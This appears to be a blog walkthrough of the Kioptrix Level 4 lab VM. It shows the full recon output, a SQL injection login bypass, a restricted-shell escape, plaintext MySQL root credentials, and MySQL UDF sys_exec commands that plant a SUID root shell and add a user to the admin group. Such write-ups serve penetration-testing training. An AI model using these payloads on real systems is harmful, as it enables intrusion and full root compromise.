LifesFun's 101

"The only true wisdom is in knowing you know nothing." - Socrates


Kioptrix 1.3 (Level 4) Walkthrough

05 Sep 2019

Kioptrix level 4 is second penetration testing challenge from Kioptrix series. This particular machine is vulnerable to SQL Injection, Plaintext Credentials stored on the vulnerable app, SQL Credentials stored in plaintext and MySQL with User-Defined Function cabapilities running with administrative priviliges.

Vulnerable System: Kioptrix 1.3 (Level 4)

Operating System: Ubuntu 8.04

Kernel: 2.6.24

Vulnerability Exploited: SQL Injection (password)

Exploit Used: N/A

Proof of Concept Code: ‘ or 1=’1

Vulnerability Explained: Web application’s login page had a field (password) vulnerable to SQL injection. Upon exploiting this vulnerability access was granted to Member’s Control Panel and 2 users’ credentials were obtained from the web application.

Vulnerability fix: When making a login page that connects to MySQL database, either use dynamic queries or make sure that user’s input is validated.

Severity: Medium

Privilege Escalation Vulnerability: MySQL server with no password protection and MySQL User Defined Functions (UDF)

Exploit Used: N/A

Proof of Concept Code: select sys_exec(‘usermod -a -G admin robert’);

Privilege Escalation Vulnerability Explained: Due to MySQL database’s root user having no password, the database is easily accessible. The database also has User Defined Functions capabilities along with having administrative privileges. User Defined Functions allows for system commands to be executed from within the database. Therefore, since the database is running as root, the commands are executed with administrative privileges.

Vulnerability fix: MySQL database should be protected with a strong password. The password should not be present in any configuration files in plaintext form. MySQL database should be ran under a limited privilege user such as mysql instead of being ran as root.

Severity: High

Methodology

  • Host Discovery (netdiscover)

  • Port Scanning (nmap)

  • Web Port Enumeration (nikto, gobuster, browser)

  • Discovered MySQL injection (browser)

  • Low Privilege Shell Gained (SSH)

  • Privilege Escalation Enumeration (ps aux | grep root | grep -v ])

  • Discovered Appropriate Exploit (MySQL UDF Local Privilege Escalation)

  • Added User to Administrative Group to Gain Administrative Privileges)

Reconnaissance

Netdiscover

Discovering the vulnerable system with netdiscover

root@kali:~# netdiscover -r 192.168.211.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.211.1   00:50:56:c0:00:01      1      60  VMware, Inc.                
 192.168.211.129 00:0c:29:09:78:87      1      60  VMware, Inc.                
 192.168.211.254 00:50:56:e9:22:18      1      60  VMware, Inc.

Nmap

Nmap all ports scan:

root@kali:~# nmap -p- 192.168.211.129
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-03 23:45 EDT
Nmap scan report for 192.168.211.129
Host is up (0.00067s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:09:78:87 (VMware)

Nmap version and default script scan:

root@kali:~# nmap -sV -sC -A -p 22,80,139,445 192.168.211.129
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-03 23:46 EDT
Nmap scan report for 192.168.211.129
Host is up (0.00071s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:09:78:87 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h00m00s, deviation: 2h49m42s, median: -4h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2019-09-03T19:47:05-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.71 ms 192.168.211.129

Enum4linux

Enumerating Samba components with enum4linux (grep was used to get cleaner output)

root@kali:~# enum4linux 192.168.211.129 | grep -v unknown
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep  3 23:49:08 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.211.129
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.211.129    |
 ======================================================= 
[+] Got domain/workgroup name: WORKGROUP

 =============================================== 
|    Nbtstat Information for 192.168.211.129    |
 =============================================== 
Looking up status of 192.168.211.129
	KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
	KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
	KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

	MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.211.129    |
 ======================================== 
[+] Server 192.168.211.129 allows sessions using username '', password ''

 ============================================== 
|    Getting domain SID for 192.168.211.129    |
 ============================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    OS information on 192.168.211.129    |
 ========================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.211.129 from smbclient: 
[+] Got OS info for 192.168.211.129 from srvinfo:
	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	4.9
	server type     :	0x809a03

 ================================ 
|    Users on 192.168.211.129    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

 ============================================ 
|    Share Enumeration on 192.168.211.129    |
 ============================================ 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.211.129
//192.168.211.129/print$	Mapping: DENIED, Listing: N/A
//192.168.211.129/IPC$	[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

 ======================================================= 
|    Password Policy Information for 192.168.211.129    |
 ======================================================= 


[+] Attaching to 192.168.211.129 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] KIOPTRIX4
	[+] Builtin

[+] Password Info for Domain: KIOPTRIX4

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: Not Set
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================= 
|    Groups on 192.168.211.129    |
 ================================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================== 
|    Users on 192.168.211.129 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)

 ================================================ 
|    Getting printer info for 192.168.211.129    |
 ================================================ 
No printers returned.

enum4linux complete on Tue Sep  3 23:49:35 2019

The scan above provided 3 usernames: john, robert and loneferret

Web Port Enumeration

Nikto

root@kali:~# nikto -h 192.168.211.129
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.211.129
+ Target Hostname:    192.168.211.129
+ Target Port:        80
+ Start Time:         2019-09-03 23:51:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. 
The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: 
PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: 
PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: 
PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: 
PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2019-09-03 23:51:45 (GMT-4) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

GoBuster

Discovering hidden web directories with GoBuster:

root@kali:~# gobuster dir -u 192.168.211.129 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.211.129
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/03 23:54:23 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/cgi-bin/ (Status: 403)
/images (Status: 301)
/index (Status: 200)
/index.php (Status: 200)
/john (Status: 301)
/logout (Status: 302)
/member (Status: 302)
/server-status (Status: 403)
===============================================================
2019/09/03 23:54:25 Finished
===============================================================

Browser

Using the browser to enumerate webpage and discovering Member Login page.

Low Privilege Exploitation

SQL Injection

Using usernames discovered with enum4linux, password field can be injected with the following code: ' or 1='1

SSH

With credentials obtained from Member’s Control Panel, SSH can be used to get low privilege shell to the system.

ssh robert@192.168.211.129

robert@192.168.211.129's password:

Welcome to LigGoat Security Systems - We are Watching

== Welcome LigGoat Employee ==

LigGoat Shell is in place so you don't screw up

Type '?' or 'help' to get the list of allowed commands

robert:\~\$ ?

cd clear echo exit help ll lpath ls

Escaping the Shell

As the low privilige shell is very restrictive echo command can be used to obtain a non-restrictive shell.

robert:\~\$ echo os.system('/bin/bash')

Privilege Escalation Enumeration ——————————–

Determining what services are running on the system.

Below service running with root priviliges are displayed.

robert@Kioptrix4:/$ ps aux | grep root | grep -v ]
root         1  0.0  0.1   2844  1692 ?        Ss   19:40   0:02 /sbin/init
root      2875  0.0  0.0   2236   728 ?        S<s  19:41   0:00 /sbin/udevd --daemon
root      4643  0.0  0.0   1716   488 tty4     Ss+  19:41   0:00 /sbin/getty 38400 tty4
root      4645  0.0  0.0   1716   492 tty5     Ss+  19:41   0:00 /sbin/getty 38400 tty5
root      4652  0.0  0.0   1716   492 tty2     Ss+  19:41   0:00 /sbin/getty 38400 tty2
root      4655  0.0  0.0   1716   492 tty3     Ss+  19:41   0:00 /sbin/getty 38400 tty3
root      4659  0.0  0.0   1716   492 tty6     Ss+  19:41   0:00 /sbin/getty 38400 tty6
root      4711  0.0  0.0   1872   544 ?        S    19:41   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4732  0.0  0.0   5316   992 ?        Ss   19:41   0:00 /usr/sbin/sshd
root      4788  0.0  0.0   1772   524 ?        S    19:41   0:00 /bin/sh /usr/bin/mysqld_safe
root      4830  0.0  1.7 127224 17608 ?        Sl   19:41   0:04 /usr/sbin/mysqld --basedir=/usr 
--datadir=/var/lib/mysql --user=root --pid-file=/var/ru
root      4832  0.0  0.0   1700   552 ?        S    19:41   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4905  0.0  0.1   6528  1332 ?        Ss   19:41   0:00 /usr/sbin/nmbd -D
root      4907  0.0  0.2  10108  2544 ?        Ss   19:41   0:00 /usr/sbin/smbd -D
root      4921  0.0  0.0  10108  1028 ?        S    19:41   0:00 /usr/sbin/smbd -D
root      4922  0.0  0.1   8084  1340 ?        Ss   19:41   0:00 /usr/sbin/winbindd
root      4926  0.0  0.1   8208  1704 ?        S    19:41   0:00 /usr/sbin/winbindd
root      4954  0.0  0.0   2104   888 ?        Ss   19:41   0:00 /usr/sbin/cron
root      4976  0.0  0.5  20464  6200 ?        Ss   19:41   0:00 /usr/sbin/apache2 -k start
root      5031  0.0  0.0   1716   492 tty1     Ss+  19:41   0:00 /sbin/getty 38400 tty1
root      5050  0.0  0.0   8084   868 ?        S    19:47   0:00 /usr/sbin/winbindd
root      5051  0.0  0.1   8092  1264 ?        S    19:47   0:00 /usr/sbin/winbindd
robert    8762  0.0  0.0   3004   752 pts/2    R+   22:21   0:00 grep root

From the above output it was determined that MySQL server is running with administrative privileges.

Searching for MySQL password:

Next we can attempt to gain access to MySQL database by searching for a script containing mysql password. Often these files are located in web directory on the server.

robert@Kioptrix4:/$ cd /var/www/

robert@Kioptrix4:/var/www$ grep -rl "password" *
checklogin.php
database.sql
index.php
john/john.php
robert/robert.php

robert@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

MySQL credentials were found in checklogin.php file located in /var/www directory.

Vulnerability Identification

Searchsploit

Using searchsploit to looking for appropriate exploit in exploit-db. It seems like User-Defined Functions is an appropriate vulnerability. User-Defined Functions has one particular function called sys_exec, which lets a user execute system commands from within MySQL.

root@kali:/opt/LinEnum# searchsploit MySQL Privilege Escalation
--------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                               |  Path
                                                                                             | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------- ----------------------------------------
MySQL (Linux) - Database Privilege Escalation                                                | exploits/linux/local/23077.pl
MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation     | exploits/linux/local/40360.txt
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / R | exploits/linux/local/40678.c
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' System User Privilege Escalation      | exploits/linux/local/40679.sh
MySQL 3.23.x - 'mysqld' Local Privilege Escalation                                           | exploits/linux/local/22340.txt
MySQL 4.x - CREATE Temporary TABLE Symlink Privilege Escalation                              | exploits/multiple/remote/25211.c
MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation              | exploits/linux/local/46249.py
Oracle MySQL < 5.1.50 - Privilege Escalation                                                 | exploits/multiple/remote/34796.txt
cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)                           | exploits/php/webapps/2554.php
cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation                                   | exploits/linux/local/2466.pl
--------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Determining path to the exploit and copying it to the clipboard.

root@kali:~/vulnhub/kioptrix4# searchsploit -p 46249
  Exploit: MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/46249
     Path: /usr/share/exploitdb/exploits/linux/local/46249.py
File Type: ASCII text, with very long lines, with CRLF line terminators

Copied EDB-ID #46249's path to the clipboard.

From the script found above, it seems like the exploit is trying to create a SUID binary:

os.system('mysql -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh\')"')

SimpleHTTPServer

Next the exploit needs to be transfered to the vicitms machine. Serving exploit using Python’s SimpleHTTP server:

root@kali:~/vulnhub/kioptrix4# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.211.129 - - [04/Sep/2019 13:08:28] "GET /46249.py HTTP/1.0" 200 –

Downloading the exploit to victim’s machine:

robert@Kioptrix4:/tmp$ wget 192.168.211.130:8000/46249.py
--22:30:57--  http://192.168.211.130:8000/46249.py
           => `46249.py'
Connecting to 192.168.211.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,215 (30K) [text/plain]

100%[==========================>] 31,215        --.--K/s             

22:30:57 (146.56 MB/s) - `46249.py' saved [31215/31215]

Privilege Escalation

Running the exploit.

robert\@Kioptrix4:/tmp\$ python 46249.py

Traceback (most recent call last):

File "46249.py", line 35, in \<module\>

import argparse

ImportError: No module named argparse

Above python script did not work due to argparse module not being present on the system, next a manual attempt will be performed.

After reading about the vulnerability in the article below, it seems like lib_mysqludf_sys needs to be present in order to exploit the vulnerability:

https://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html

Searching for the library:

robert@Kioptrix4:/tmp$ find / -name lib_mysqludf_sys* 2>/dev/null
/usr/lib/lib_mysqludf_sys.so

After searching for the library, it is confirmed that it’s present on the system.

Next, MySQL authentication should be performed:

robert@Kioptrix4:/tmp$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 17267
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

Privilege Escalation can be done in several ways.

As per the python script above, once MySQL authentication is performed, the same command can be executed manually in MySQL. As can be seen below the SUID binary was created and when executed access to root account has been granted.

mysql> select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh')
    -> ;
+-------------------------------------------------------------------------+
| sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh') |
+-------------------------------------------------------------------------+
| NULL                                                                    | 
+-------------------------------------------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
robert@Kioptrix4:~$ cd /tmp/
robert@Kioptrix4:/tmp$ ls
46249.py  LinEnum.sh  sh
robert@Kioptrix4:/tmp$ ./sh
# whoami
root

Second way is to add the user (robert) to administrative group.

mysql> select sys_exec('usermod -a -G admin robert');
+----------------------------------------+
| sys_exec('usermod -a -G admin robert') |
+----------------------------------------+
| NULL                                   | 
+----------------------------------------+
1 row in set (0.04 sec)
mysql> exit
Bye

User Robert has now been added to administrative group. Now the switch can be made to root user from Robert’s account as shown below:

robert@Kioptrix4:/tmp$ sudo su
[sudo] password for robert: 
root@Kioptrix4:/tmp# whoami
root

Lastly, the root flag has been obtained:

root@Kioptrix4:/tmp# cd /root
root@Kioptrix4:~# cat congrats.txt 
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

comments powered by Disqus